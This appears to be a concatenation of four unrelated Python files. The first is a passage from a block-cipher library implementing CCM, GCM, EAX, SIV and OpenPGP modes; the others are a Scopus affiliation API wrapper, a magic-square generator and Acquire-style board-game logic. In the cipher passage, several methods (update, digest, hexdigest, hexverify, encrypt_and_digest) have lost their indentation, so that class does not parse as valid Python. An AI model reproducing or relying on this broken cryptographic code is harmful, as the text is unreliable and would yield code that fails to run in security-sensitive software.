            segment_size=self.block_size * 8
            )
    def _start_ccm(self, assoc_len=None, msg_len=None):
        # CCM mode. This method creates the 2 ciphers used for the MAC
        # (self._cipherMAC) and for the encryption/decryption (self._cipher).
        #
        # Member _assoc_buffer may already contain user data that needs to be
        # authenticated.
        if self._cipherMAC.can_reduce():
            # Already started
            return
        if assoc_len is not None:
            self._assoc_len = assoc_len
        if msg_len is not None:
            self._msg_len = msg_len
        if None in (self._assoc_len, self._msg_len):
            # Both lengths are needed to build B_0; keep buffering until
            # they are known.
            return

        # q is the length of Q, the encoding of the message length
        q = 15 - len(self.nonce)

        ## Compute B_0 (flags byte, nonce, encoded message length)
        flags = (
            64 * (self._assoc_len > 0) +
            8 * divmod(self._mac_len - 2, 2)[0] +
            (q - 1)
        )
        b_0 = bchr(flags) + self.nonce + long_to_bytes(self._msg_len, q)

        # Start CBC MAC with zero IV
        # The associated-data length is encoded in 2, 2+4 or 2+8 bytes
        # depending on its magnitude (the 0xFFFE/0xFFFF markers select
        # the wider encodings).
        assoc_len_encoded = b('')
        if self._assoc_len > 0:
            if self._assoc_len < (2 ** 16 - 2 ** 8):
                enc_size = 2
            elif self._assoc_len < (2 ** 32):
                assoc_len_encoded = b('\xFF\xFE')
                enc_size = 4
            else:
                assoc_len_encoded = b('\xFF\xFF')
                enc_size = 8
            assoc_len_encoded += long_to_bytes(self._assoc_len, enc_size)
        self._cipherMAC._ignite(b_0 + assoc_len_encoded)

        # Start CTR cipher; the fixed prefix of each counter block is the
        # flags byte (q-1) followed by the nonce.
        prefix = bchr(q - 1) + self.nonce
        ctr = Counter.new(128 - len(prefix) * 8, prefix, initial_value=0)
        self._cipher = self._factory.new(self._key, MODE_CTR, counter=ctr)
        # Will XOR against CBC MAC
        self._s_0 = self._cipher.encrypt(bchr(0) * 16)
def update(self, assoc_data):
"""Protect associated data
When using an AEAD mode like CCM, EAX, GCM or SIV, and
if there is any associated data, the caller has to invoke
this function one or more times, before using
``decrypt`` or ``encrypt``.
By *associated data* it is meant any data (e.g. packet headers) that
will not be encrypted and will be transmitted in the clear.
However, the receiver is still able to detect any modification to it.
In CCM and GCM, the *associated data* is also called
*additional authenticated data* (AAD).
In EAX, the *associated data* is called *header*.
If there is no associated data, this method must not be called.
The caller may split associated data in segments of any size, and
invoke this method multiple times, each time with the next segment.
:Parameters:
assoc_data : byte string
A piece of associated data. There are no restrictions on its size.
"""
if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
raise TypeError("update() not supported by this mode of operation")
if self.update not in self._next:
raise TypeError("update() can only be called immediately after initialization")
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
return self._cipherMAC.update(assoc_data)
    def encrypt(self, plaintext):
        """Encrypt data with the key and the parameters set at initialization.

        A cipher object is stateful: once you have encrypted a message
        you cannot encrypt (or decrypt) another message using the same
        object.

        For `MODE_SIV` (always) and `MODE_CCM` (when ``msg_len`` was not
        passed at initialization), this method can be called only **once**.
        For all other modes, the data to encrypt can be broken up in two or
        more pieces and `encrypt` can be called multiple times; that is,
        ``c.encrypt(a) + c.encrypt(b)`` is equivalent to ``c.encrypt(a+b)``.

        This function does not add any padding to the plaintext.

         - For `MODE_ECB` and `MODE_CBC`, *plaintext* length (in bytes) must be
           a multiple of *block_size*.
         - For `MODE_CFB`, *plaintext* length (in bytes) must be a multiple
           of *segment_size*/8.
         - For `MODE_OFB`, `MODE_CTR` and all AEAD modes
           *plaintext* can be of any length.
         - For `MODE_OPENPGP`, *plaintext* must be a multiple of *block_size*,
           unless it is the last chunk of the message.

        :Parameters:
          plaintext : byte string
            The piece of data to encrypt.
        :Return:
            the encrypted data, as a byte string. It is as long as
            *plaintext* with one exception: when encrypting the first message
            chunk with `MODE_OPENPGP`, the encrypted IV is prepended to the
            returned ciphertext.
        """
        if self.mode == MODE_OPENPGP:
            padding_length = (self.block_size - len(plaintext) % self.block_size) % self.block_size
            if padding_length > 0:
                # CFB mode requires ciphertext to have length multiple
                # of block size,
                # but PGP mode allows the last block to be shorter
                if self._done_last_block:
                    # NOTE(review): the comma makes the size part of the
                    # ValueError args tuple rather than a %-formatted
                    # message -- inherited wart, kept as-is.
                    raise ValueError("Only the last chunk is allowed to have length not multiple of %d bytes",
                        self.block_size)
                self._done_last_block = True
                padded = plaintext + b('\x00') * padding_length
                # Encrypt the zero-padded block, then trim back to the
                # caller's length.
                res = self._cipher.encrypt(padded)[:len(plaintext)]
            else:
                res = self._cipher.encrypt(plaintext)
            if not self._done_first_block:
                # First chunk: prepend the encrypted IV per RFC 4880.
                res = self._encrypted_IV + res
                self._done_first_block = True
            return res
        if self.mode in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
            # AEAD state machine: after the first encrypt() only more
            # encrypt() calls or digest() are legal.
            if self.encrypt not in self._next:
                raise TypeError("encrypt() can only be called after initialization or an update()")
            self._next = [self.encrypt, self.digest]
        if self.mode == MODE_CCM:
            # CCM needs both lengths up front; if msg_len was not given,
            # this first chunk IS the whole message (single-shot only).
            if self._assoc_len is None:
                self._start_ccm(assoc_len=self._cipherMAC.get_len())
            if self._msg_len is None:
                self._start_ccm(msg_len=len(plaintext))
                self._next = [self.digest]
            if not self._done_assoc_data:
                self._cipherMAC.zero_pad()
                self._done_assoc_data = True
            # CCM authenticates the *plaintext* (MAC-then-encrypt).
            self._cipherMAC.update(plaintext)
        if self.mode == MODE_SIV:
            # SIV is single-shot: derive the synthetic IV from nonce and
            # plaintext, then build the CTR cipher keyed on it.
            self._next = [self.digest]
            if self.nonce:
                self._cipherMAC.update(self.nonce)
            self._cipherMAC.update(plaintext)
            self._cipher = self._siv_ctr_cipher(self._cipherMAC.derive())
        ct = self._cipher.encrypt(plaintext)
        if self.mode == MODE_EAX:
            # EAX authenticates the *ciphertext* (encrypt-then-MAC).
            self._omac[2].update(ct)
        if self.mode == MODE_GCM:
            if not self._done_assoc_data:
                self._cipherMAC.zero_pad()
                self._done_assoc_data = True
            # GCM authenticates the *ciphertext* via GHASH.
            self._cipherMAC.update(ct)
            self._msg_len += len(plaintext)
        return ct
    def decrypt(self, ciphertext):
        """Decrypt data with the key and the parameters set at initialization.

        A cipher object is stateful: once you have decrypted a message
        you cannot decrypt (or encrypt) another message with the same
        object.

        For `MODE_CCM` (when ``msg_len`` was not passed at initialization)
        this method can be called only **once**; `MODE_SIV` forbids it
        entirely (use `decrypt_and_verify`).  For all other modes, the data
        can be broken up in pieces: ``c.decrypt(a) + c.decrypt(b)`` is
        equivalent to ``c.decrypt(a+b)``.

        This function does not remove any padding from the plaintext.

         - For `MODE_ECB` and `MODE_CBC`, *ciphertext* length (in bytes) must
           be a multiple of *block_size*.
         - For `MODE_CFB`, *ciphertext* length (in bytes) must be a multiple
           of *segment_size*/8.
         - For `MODE_OFB`, `MODE_CTR` and all AEAD modes
           *ciphertext* can be of any length.
         - For `MODE_OPENPGP`, *ciphertext* must be a multiple of
           *block_size*, unless it is the last chunk of the message.

        :Parameters:
          ciphertext : byte string
            The piece of data to decrypt.
        :Return: the decrypted data (byte string).
        """
        if self.mode == MODE_OPENPGP:
            padding_length = (self.block_size - len(ciphertext) % self.block_size) % self.block_size
            if padding_length > 0:
                # CFB mode requires ciphertext to have length multiple
                # of block size,
                # but PGP mode allows the last block to be shorter
                if self._done_last_block:
                    # NOTE(review): comma instead of % -- the size becomes a
                    # second exception argument; inherited wart, kept as-is.
                    raise ValueError("Only the last chunk is allowed to have length not multiple of %d bytes",
                        self.block_size)
                self._done_last_block = True
                padded = ciphertext + b('\x00') * padding_length
                # Decrypt the padded block, then trim to the real length.
                res = self._cipher.decrypt(padded)[:len(ciphertext)]
            else:
                res = self._cipher.decrypt(ciphertext)
            return res
        if self.mode == MODE_SIV:
            raise TypeError("decrypt() not allowed for SIV mode."
                            " Use decrypt_and_verify() instead.")
        if self.mode in (MODE_CCM, MODE_EAX, MODE_GCM):
            # AEAD state machine: after the first decrypt() only more
            # decrypt() calls or verify() are legal.
            if self.decrypt not in self._next:
                raise TypeError("decrypt() can only be called after initialization or an update()")
            self._next = [self.decrypt, self.verify]
        if self.mode == MODE_CCM:
            # Both lengths must be known; a missing msg_len means this is
            # a single-shot decryption of the whole message.
            if self._assoc_len is None:
                self._start_ccm(assoc_len=self._cipherMAC.get_len())
            if self._msg_len is None:
                self._start_ccm(msg_len=len(ciphertext))
                self._next = [self.verify]
            if not self._done_assoc_data:
                self._cipherMAC.zero_pad()
                self._done_assoc_data = True
        if self.mode == MODE_GCM:
            if not self._done_assoc_data:
                self._cipherMAC.zero_pad()
                self._done_assoc_data = True
            # GCM authenticates the *ciphertext*.
            self._cipherMAC.update(ciphertext)
            self._msg_len += len(ciphertext)
        if self.mode == MODE_EAX:
            # EAX authenticates the *ciphertext*.
            self._omac[2].update(ciphertext)
        pt = self._cipher.decrypt(ciphertext)
        if self.mode == MODE_CCM:
            # CCM authenticates the recovered *plaintext*.
            self._cipherMAC.update(pt)
        return pt
def digest(self):
"""Compute the *binary* MAC tag in an AEAD mode.
When using an AEAD mode like CCM or EAX, the caller invokes
this function at the very end.
This method returns the MAC that shall be sent to the receiver,
together with the ciphertext.
:Return: the MAC, as a byte string.
"""
if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
raise TypeError("digest() not supported by this mode of operation")
if self.digest not in self._next:
raise TypeError("digest() cannot be called when decrypting or validating a message")
self._next = [self.digest]
return self._compute_mac()
    def _compute_mac(self):
        """Compute MAC without any FSM checks.

        The result is cached in ``self._tag`` so that repeated
        digest()/verify() calls return the same value.
        """
        if self._tag:
            return self._tag
        if self.mode == MODE_CCM:
            # If the lengths were never supplied, finalize with what we
            # have (empty message counts as length 0).
            if self._assoc_len is None:
                self._start_ccm(assoc_len=self._cipherMAC.get_len())
            if self._msg_len is None:
                self._start_ccm(msg_len=0)
            self._cipherMAC.zero_pad()
            # T = CBC-MAC XOR S_0, truncated to the requested tag length.
            self._tag = strxor(self._cipherMAC.digest(),
                               self._s_0)[:self._mac_len]
        if self.mode == MODE_GCM:
            # Step 5 in NIST SP 800-38D, Algorithm 4 - Compute S
            self._cipherMAC.zero_pad()
            auth_len = self._cipherMAC.get_len() - self._msg_len
            # Append the 64-bit *bit* lengths of AAD and ciphertext.
            for tlen in (auth_len, self._msg_len):
                self._cipherMAC.update(long_to_bytes(8 * tlen, 8))
            s_tag = self._cipherMAC.digest()
            # Step 6 - Compute T
            self._tag = self._tag_cipher.encrypt(s_tag)[:self._mac_len]
        if self.mode == MODE_EAX:
            # Tag = OMAC(nonce) XOR OMAC(header) XOR OMAC(ciphertext).
            tag = bchr(0) * self.block_size
            for i in range(3):
                tag = strxor(tag, self._omac[i].digest())
            self._tag = tag[:self._mac_len]
        if self.mode == MODE_SIV:
            # The synthetic IV doubles as the tag.
            self._tag = self._cipherMAC.derive()
        return self._tag
def hexdigest(self):
"""Compute the *printable* MAC tag in an AEAD mode.
This method is like `digest`.
:Return: the MAC, as a hexadecimal string.
"""
return "".join(["%02x" % bord(x) for x in self.digest()])
    def verify(self, mac_tag):
        """Validate the *binary* MAC tag in an AEAD mode.

        When using an AEAD mode like CCM or EAX, the caller invokes
        this function at the very end.  It checks that the decrypted
        message is indeed valid (that is, the key is correct) and has
        not been tampered with while in transit.

        :Parameters:
          mac_tag : byte string
            This is the *binary* MAC, as received from the sender.
        :Raises ValueError:
            if the MAC does not match. The message has been tampered with
            or the key is incorrect.
        """
        if self.mode not in (MODE_CCM, MODE_EAX, MODE_SIV, MODE_GCM):
            raise TypeError("verify() not supported by this mode of operation")
        if self.verify not in self._next:
            raise TypeError("verify() cannot be called when encrypting a message")
        self._next = [self.verify]
        res = 0
        # Constant-time comparison: accumulate XOR differences instead of
        # short-circuiting, so timing does not leak how long a prefix of
        # the tag matched.  zip() truncates to the shorter input; the
        # explicit length check below catches truncated tags.
        for x, y in zip(self._compute_mac(), mac_tag):
            res |= bord(x) ^ bord(y)
        if res or len(mac_tag) != self._mac_len:
            raise ValueError("MAC check failed")
def hexverify(self, hex_mac_tag):
"""Validate the *printable* MAC tag in an AEAD mode.
This method is like `verify`.
:Parameters:
hex_mac_tag : string
This is the *printable* MAC, as received from the sender.
:Raises ValueError:
if the MAC does not match. The message has been tampered with
or the key is incorrect.
"""
self.verify(unhexlify(hex_mac_tag))
def encrypt_and_digest(self, plaintext):
"""Perform encrypt() and digest() in one step.
:Parameters:
plaintext : byte string
The piece of data to encrypt.
:Return:
a tuple with two byte strings:
- the encrypted data
- the MAC
"""
return self.encrypt(plaintext), self.digest()
    def decrypt_and_verify(self, ciphertext, mac_tag):
        """Perform decrypt() and verify() in one step.

        :Parameters:
          ciphertext : byte string
            The piece of data to decrypt.
          mac_tag : byte string
            This is the *binary* MAC, as received from the sender.
        :Return: the decrypted data (byte string).
        :Raises ValueError:
            if the MAC does not match. The message has been tampered with
            or the key is incorrect.
        """
        if self.mode == MODE_SIV:
            # SIV is special-cased because decryption *requires* the tag:
            # the CTR cipher is keyed on it (the synthetic IV).
            if self.decrypt not in self._next:
                raise TypeError("decrypt() can only be called"
                                " after initialization or an update()")
            self._next = [self.verify]
            # Take the MAC and start the cipher for decryption
            self._mac = mac_tag
            self._cipher = self._siv_ctr_cipher(self._mac)
            pt = self._cipher.decrypt(ciphertext)
            # Recompute the MAC over nonce + recovered plaintext so the
            # verify() below can compare it against the received tag.
            if self.nonce:
                self._cipherMAC.update(self.nonce)
            if pt:
                self._cipherMAC.update(pt)
        else:
            pt = self.decrypt(ciphertext)
        self.verify(mac_tag)
        return pt
|
import os
import xml.etree.ElementTree as ET
import warnings
from scopus import config
from scopus.utils import get_content, get_encoded_text
# On-disk cache directory for affiliation XML responses; created once at
# import time so later cache writes cannot fail on a missing directory.
SCOPUS_AFFILIATION_DIR = os.path.expanduser('~/.scopus/affiliation')
if not os.path.exists(SCOPUS_AFFILIATION_DIR):
    os.makedirs(SCOPUS_AFFILIATION_DIR)
class ScopusAffiliation:
    """Wrap a Scopus affiliation profile retrieved from the Affiliation
    Retrieval API; the raw XML is cached on disk and exposed through
    read-only properties.
    """

    @property
    def affiliation_id(self):
        """The Scopus ID of the affiliation."""
        ident = get_encoded_text(self.xml, 'coredata/dc:identifier')
        return ident.split(":")[-1]

    @property
    def date_created(self):
        """Date the Scopus record was created, as (year, month, day)."""
        node = self.xml.find('institution-profile/date-created')
        if node is None:
            return (None, None, None)
        return (int(node.attrib['year']),
                int(node.attrib['month']),
                int(node.attrib['day']))

    @property
    def nauthors(self):
        """Number of authors in the affiliation."""
        return get_encoded_text(self.xml, 'coredata/author-count')

    @property
    def ndocuments(self):
        """Number of documents for the affiliation."""
        return get_encoded_text(self.xml, 'coredata/document-count')

    @property
    def url(self):
        """URL to the affiliation's profile page."""
        link = self.xml.find('coredata/link[@rel="scopus-affiliation"]')
        return link.get('href') if link is not None else None

    @property
    def api_url(self):
        """URL to the affiliation's API page."""
        return get_encoded_text(self.xml, 'coredata/prism:url')

    @property
    def org_type(self):
        """Type of the affiliation (only present if profile is org profile)."""
        return get_encoded_text(self.xml, 'institution-profile/org-type')

    @property
    def org_domain(self):
        """Internet domain of the affiliation."""
        return get_encoded_text(self.xml, 'institution-profile/org-domain')

    @property
    def org_url(self):
        """Website of the affiliation."""
        return get_encoded_text(self.xml, 'institution-profile/org-URL')

    @property
    def name(self):
        """The name of the affiliation."""
        return get_encoded_text(self.xml, 'affiliation-name')

    @property
    def address(self):
        """The address of the affiliation."""
        return get_encoded_text(self.xml, 'address')

    @property
    def city(self):
        """The city of the affiliation."""
        return get_encoded_text(self.xml, 'city')

    @property
    def state(self):
        """The state (country's administrative subunit) of the affiliation."""
        return get_encoded_text(self.xml, 'state')

    @property
    def country(self):
        """The country of the affiliation."""
        return get_encoded_text(self.xml, 'country')

    def __init__(self, aff_id, refresh=False):
        """Class to represent an Affiliation in Scopus.

        Parameters
        ----------
        aff_id : str or int
            The Scopus Affiliation ID.  Optionally expressed as an
            Elsevier EID (i.e., in the form 10-s2.0-nnnnnnnn).
        refresh : bool (optional, default=False)
            Whether to refresh the cached file if it exists or not.

        Notes
        -----
        The files are cached in ~/.scopus/affiliation/{aff_id}.
        """
        # One-time deprecation notice, then silenced via the config file.
        if config.getboolean('Warnings', 'Affiliation'):
            text = config.get('Warnings', 'Text').format('ContentAffiliationRetrieval')
            warnings.warn(text, DeprecationWarning)
            config.set('Warnings', 'Affiliation', '0')
        # Accept both plain IDs and EIDs; keep only the numeric tail.
        aff_id = str(int(str(aff_id).split('-')[-1]))
        cache_file = os.path.join(SCOPUS_AFFILIATION_DIR, aff_id)
        endpoint = ('https://api.elsevier.com/content/affiliation/'
                    'affiliation_id/{}'.format(aff_id))
        self.xml = ET.fromstring(get_content(cache_file, url=endpoint,
                                             refresh=refresh))

    def __str__(self):
        """Multi-line human-readable summary of the affiliation."""
        summary = '''{self.name} ({self.nauthors} authors, {self.ndocuments} documents)
    {self.address}
    {self.city}, {self.country}
    {self.url}'''.format(self=self)
        return summary
|
#! /usr/bin/env python
# coding:utf-8
# 判断输入的九宫格的格数是否为奇数
def if_odd(n):
    """Return True when n is odd, False otherwise.

    The magic-square construction below only works for odd n, so callers
    use this as a validity check on the grid size.
    """
    # The comparison already yields a bool; no if/else needed.
    return n % 2 == 1
# 九宫格填写数的法则
"""
按照下面的方式排列
-------------->x(从1到n)
|
|
|y方向(从1到n)
1、第一个数放在X方向的中间位置
2、其它数顺次放置各个位置,并依据如下原则:(假设第一个数是a,第二个数是b)
以a为中心的位置关系分别为:
左上|上|右上
左 |a |右
左下|下|右下
(1)b放在a的右上位置。a(x,y)-->b(x+1,y-1)
(2)如果仅有“右”位置超过边界,即x+1>n,则b(1,y-1)
(3)如果仅有“上”位置超过边界,即y-1<0,则b(x+1,n)
(4)如果“右”“上”位置都超过边界,即x+1>n,y-1<0,则b(x,y+1)
(5)如果“右上”已经有值,则b(x,y+1)
"""
def sudoku_rule(n, sudoku):
    """Fill an n x n grid (n odd) with 1..n*n as a magic square.

    Uses the Siamese method: start in the middle of the top row, then for
    each number move one step up-right, wrapping around the edges; when
    the target cell is occupied (or both edges are crossed) step straight
    down instead.

    :param n: odd grid size.
    :param sudoku: an n x n list of lists pre-filled with 0.
    :return: the same grid, filled in place.
    """
    # Bug fix: '/' is float division on Python 3 and would raise a
    # TypeError when used as a list index; '//' keeps the Python 2
    # behaviour on both versions.
    tx = n // 2  # start column: middle of the top row
    ty = 0
    for i in range(n * n):
        sudoku[ty][tx] = i + 1
        # Tentative move: one step right and one step up.
        tx = tx + 1
        ty = ty - 1
        if ty < 0 and tx >= n:       # (4) both edges crossed: drop below start
            tx = tx - 1
            ty = ty + 2
        elif ty < 0:                 # (3) off the top: wrap to the bottom row
            ty = n - 1
        elif tx >= n:                # (2) off the right: wrap to first column
            tx = 0
        elif sudoku[ty][tx] != 0:    # (5) target occupied: step down instead
            tx = tx - 1
            ty = ty + 2
    return sudoku
if __name__ == "__main__":
    # Demo: build and display a 5x5 magic square row by row.
    n = 5
    sudoku = [[0 for i in range(n)] for i in range(n)]
    s = sudoku_rule(n, sudoku)
    for line in s:
        # Bug fix: the original "print" statement was split from its
        # argument, so it printed a blank line and then discarded "line".
        # print(line) works on both Python 2 and Python 3.
        print(line)
|
import pygame
from utility import *
import variables
from constants import *
def place_brick(idx):
    """Place the idx-th tile from the current player's hand on the board.

    Marks the board cell as a lone tile (-2), frees the hand slot,
    updates the board counters and appends a log entry.

    :param idx: hand-slot index of the tile to place.
    :return: the board index of the placed tile.
    """
    x, y = variables.HAND_BRICK[idx]
    cell = coord2idx(x, y)
    label = x * 10 + y  # human-readable tile label for the log
    variables.BRICK_COLOR[cell] = -2      # -2 == on board, no company yet
    variables.HAND_BRICK[idx] = (0, 0)    # (0, 0) marks an empty hand slot
    variables.ON_BOARD_NUM += 1
    variables.BLANK_BLOCK_NUM -= 1
    variables.MY_LOG += "%s放置了T%s\n" % (variables.PLAYER_NAME[variables.TURN], label)
    return cell
def take_brick():
    """Draw a random tile from the pool into the first empty hand slot.

    :return: the drawn tile's board index, or -1 when the pool is empty.

    The empty slot is located *before* the pool check, so a hand with no
    (0, 0) slot raises ValueError exactly as before.
    NOTE(review): `random` is expected to come from `utility`'s
    star-import (no direct import in this module) -- confirm.
    """
    slot = variables.HAND_BRICK.index((0, 0))
    if variables.REMAINING_BLOCK_NUM == 0:
        return -1
    drawn = random.choice(variables.REMAINING_BLOCK)
    variables.HAND_BRICK[slot] = idx2coord(drawn)
    variables.REMAINING_BLOCK.remove(drawn)
    variables.REMAINING_BLOCK_NUM -= 1
    return drawn
def real_neibour(brick):
    """Return the board indices of the brick's on-board orthogonal
    neighbours (up, down, left, right).

    NOTE(review): the bounds test is strict (0 < x < 13, 0 < y < 10) and
    therefore excludes coordinate 0 -- confirm against idx2coord's range.
    """
    assert 0 <= brick <= 107, "INVALID BRICK!"
    x, y = idx2coord(brick)
    candidates = ((x, y - 1), (x, y + 1), (x - 1, y), (x + 1, y))
    return [coord2idx(cx, cy)
            for cx, cy in candidates
            if 0 < cx < 13 and 0 < cy < 10]
def detect_connection(brick):
    """Classify the placement of a just-placed brick by its neighbourhood.

    :return:
        -1  isolated (no neighbouring company, no neighbouring lone tile)
         0  only lone tiles adjacent -> a new company may be founded
         1  one company adjacent -> expansion
         2+ several companies adjacent -> merger (or discard if all safe)
    """
    neibour = real_neibour(brick)
    cnt = 0 #how many kind of companys
    # Occurrence count per colour.  Lone tiles have colour -2, which wraps
    # to slot 7 of this 9-long list (negative-index trick), so cnt_list[-2]
    # ends up counting adjacent lone tiles.
    cnt_list = [0,]*9
    for i in neibour:
        if variables.BRICK_COLOR[i]>=0 and cnt_list[variables.BRICK_COLOR[i]]==0: #company
            cnt+=1
        cnt_list[variables.BRICK_COLOR[i]]+=1
    # Neither a company nor a lone tile adjacent: nothing to connect.
    if cnt==0 and cnt_list[-2]==0:
        return -1
    return cnt
def expand(brick):
    """Grow the single adjacent company by the placed brick plus any lone
    tiles connected to it, then refresh the share prices.

    Assumes exactly one neighbouring company (detect_connection() == 1).
    """
    neibour = real_neibour(brick)
    single_brick = [brick,]
    company_id = -1
    for i in neibour:
        if variables.BRICK_COLOR[i]==-2: #single brick
            single_brick.append(i)
        elif 0<=variables.BRICK_COLOR[i]<7: #company
            company_id = variables.BRICK_COLOR[i]
    # Recolour the new tiles with the company's id and grow its size.
    for b in single_brick:
        variables.BRICK_COLOR[b]=company_id
    variables.COMPANY_SIZE[company_id]+=len(single_brick)
    update_stock_price()
def acquire_list(brick):
    """Return the distinct company ids adjacent to `brick`, in the order
    their tiles are first encountered (used to pick merger participants).
    """
    found = []
    for cell in real_neibour(brick):
        colour = variables.BRICK_COLOR[cell]
        if 0 <= colour < 7 and colour not in found:  # company tile, new id
            found.append(colour)
    return found
def acquire(brick,large_idx):
    """Merge the smaller adjacent company into company `large_idx`.

    The placed brick and any adjacent lone tiles join the surviving
    company; every tile of the absorbed company is recoloured; the
    absorbed company is zeroed out; finally its shareholders are paid a
    bonus based on its last share price (rounded down to multiples of
    100 and split among tied holders).

    NOTE(review): the log line reads variables.LARGE_COMPANY /
    variables.SMALL_COMPANY instead of large_idx / small_company_id --
    presumably set by the caller beforehand; confirm they always agree.
    """
    neibour = real_neibour(brick)
    single_brick = [brick,]
    small_company_id = -1
    for i in neibour:
        if variables.BRICK_COLOR[i]==-2: #single brick
            single_brick.append(i)
        elif 0<=variables.BRICK_COLOR[i]<7 and variables.BRICK_COLOR[i]!=large_idx:
            small_company_id = variables.BRICK_COLOR[i]
    # New tiles join the surviving company.
    for b in single_brick:
        variables.BRICK_COLOR[b]=large_idx
    variables.MY_LOG+="%s公司收购了%s公司\n" %(COMPANY_NAME[variables.LARGE_COMPANY],COMPANY_NAME[variables.SMALL_COMPANY])
    # Surviving company absorbs the smaller one plus the new tiles.
    variables.COMPANY_SIZE[large_idx]+=(variables.COMPANY_SIZE[small_company_id]+len(single_brick))
    variables.BRICK_COLOR=[large_idx if value == small_company_id else value for value in variables.BRICK_COLOR]
    variables.COMPANY_SIZE[small_company_id]=0
    variables.LIVE_COMPANY[small_company_id]=0
    # Shareholder bonus: 2 marks a major holder, 1 a minor holder.
    company_stock_list = [stock[small_company_id] for stock in variables.MAJOR_MINOR]
    large_num = company_stock_list.count(2)
    small_num = company_stock_list.count(1)
    if small_num==0: #common major or only one major
        # Majors split a 15x-price bonus, rounded down to multiples of 100.
        share = 15*variables.COMPANY_PRICE[small_company_id]
        for i in range(variables.NUM_PLAYER):
            if variables.MAJOR_MINOR[i][small_company_id]==2:
                ma_share = share//100//large_num*100
                variables.MONEY[i]+=ma_share
                variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
    else:
        # Majors split 10x price, minors split 5x price.
        l_share = 10*variables.COMPANY_PRICE[small_company_id]
        s_share = 5*variables.COMPANY_PRICE[small_company_id]
        for i in range(variables.NUM_PLAYER):
            if variables.MAJOR_MINOR[i][small_company_id]==2:
                ma_share = l_share//100//large_num*100
                variables.MONEY[i]+=ma_share
                variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
            elif variables.MAJOR_MINOR[i][small_company_id]==1:
                mi_share = s_share//100//small_num*100
                variables.MONEY[i]+=mi_share
                variables.MY_LOG+="%s作为二股东获得分红%s\n" %(variables.PLAYER_NAME[i],mi_share)
def desert(brick):
    """Mark the board cell as permanently discarded (colour -3)."""
    variables.BRICK_COLOR[brick] = -3
def establish(brick, selection):
    """Found company `selection` on `brick` and the lone tiles touching it.

    The founding player receives one free share when the bank still has
    stock of that company.  Appends a log entry.
    """
    chain = [brick]
    for cell in real_neibour(brick):
        if cell is not None and variables.BRICK_COLOR[cell] == -2:  # lone tile joins the chain
            chain.append(cell)
    for cell in chain:
        variables.BRICK_COLOR[cell] = selection
    variables.COMPANY_SIZE[selection] += len(chain)
    variables.LIVE_COMPANY[selection] = 1
    # Founder's bonus share, if the bank has any stock left.
    if variables.COMPANY_STOCK_NUM[selection] > 0:
        variables.STOCK_AT_HAND[variables.TURN][selection] += 1
        variables.COMPANY_STOCK_NUM[selection] -= 1
    variables.MY_LOG += "%s建立了公司%s\n" % (variables.PLAYER_NAME[variables.TURN], COMPANY_NAME[selection])
def update_stock_price():
    """Recompute the share price of all 7 companies from their chain size.

    The price is read from COMPANY_PRICE_TABLE at the company's base row
    (COMPANY[COMPANY_NAME[i]]) plus a size-bracket offset.

    NOTE(review): no branch handles c_sz == 1 -- in that case `price`
    keeps the value computed for the previous company (or raises
    NameError for company 0).  Sizes presumably jump from 0 straight to
    >= 2 (establish() always adds at least two tiles) -- confirm.
    """
    for i in range(7):
        c_sz = variables.COMPANY_SIZE[i]
        if c_sz == 0:
            price = 0
        elif 2<=c_sz<=5:
            # Sizes 2-5 map to individual table rows.
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+c_sz-2]
        elif 5<c_sz<=10:
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+4]
        elif 10<c_sz<=20:
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+5]
        elif 20<c_sz<=30:
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+6]
        elif 30<c_sz<=40:
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+7]
        elif c_sz>40:
            price = COMPANY_PRICE_TABLE[COMPANY[COMPANY_NAME[i]]+8]
        variables.COMPANY_PRICE[i]=price
def major_minor():
    """Recompute MAJOR_MINOR for every company.

    For each live company players are ranked by shares held:
    2 = major holder, 1 = minor holder, 0 = neither.  A tie for first
    produces several majors and no minor.
    """
    for i in range(7):
        if variables.LIVE_COMPANY[i]==0:
            # Dead company: nobody holds a position in it.
            for j in range(variables.NUM_PLAYER):
                variables.MAJOR_MINOR[j][i]=0
        elif variables.LIVE_COMPANY[i]==1:
            # Shares of company i per player, ranked descending.
            # NOTE: the comprehension variable `i` below shadows the loop
            # index only inside the comprehension (Python 3 scoping).
            company_stock_list = [stock[i] for stock in variables.STOCK_AT_HAND]
            sorted_list = sorted(enumerate(company_stock_list), key=lambda x: x[1],reverse=True)
            idx = [i[0] for i in sorted_list]
            nums = [i[1] for i in sorted_list]
            major_num = nums[0]
            if major_num==0:
                # Nobody owns any stock of this company.
                for j in range(variables.NUM_PLAYER):
                    variables.MAJOR_MINOR[idx[j]][i]=0
            else:
                if nums.count(major_num)>=2: #common major
                    # Tied for first: every one of them is a major holder.
                    for j in range(nums.count(major_num)):
                        variables.MAJOR_MINOR[idx[j]][i]=2
                else:
                    minor_num = nums[1]
                    variables.MAJOR_MINOR[idx[0]][i]=2
                    if minor_num==0:
                        # Runner-up owns nothing: no minor holders.
                        for j in range(nums.count(minor_num)):
                            variables.MAJOR_MINOR[idx[j+1]][i]=0
                    else:
                        # All players tied at the runner-up count are minors.
                        for j in range(nums.count(minor_num)):
                            variables.MAJOR_MINOR[idx[j+1]][i]=1
def end_turn():
    """Finish the current player's turn.

    If the game-end condition holds, only logs the end of the game;
    otherwise advances TURN, clears all per-turn flags and counters, and
    logs whose turn it is now.
    """
    if check_final() == 1:
        variables.MY_LOG += "\n游戏结束!\n"
        return
    variables.TURN = (variables.TURN + 1) % variables.NUM_PLAYER
    variables.BUY_STOCK_NUM = 0
    variables.brick_idx = None
    # Reset every per-turn state flag in one sweep.
    for flag in ("place_flag", "establish_flag", "acquire_flag",
                 "buy_stock_flag", "has_put_flag", "has_buy_flag"):
        setattr(variables, flag, False)
    variables.AC_LIST = [0,] * 7
    variables.MY_LOG += "\n轮到%s执行\n" % (variables.PLAYER_NAME[variables.TURN])
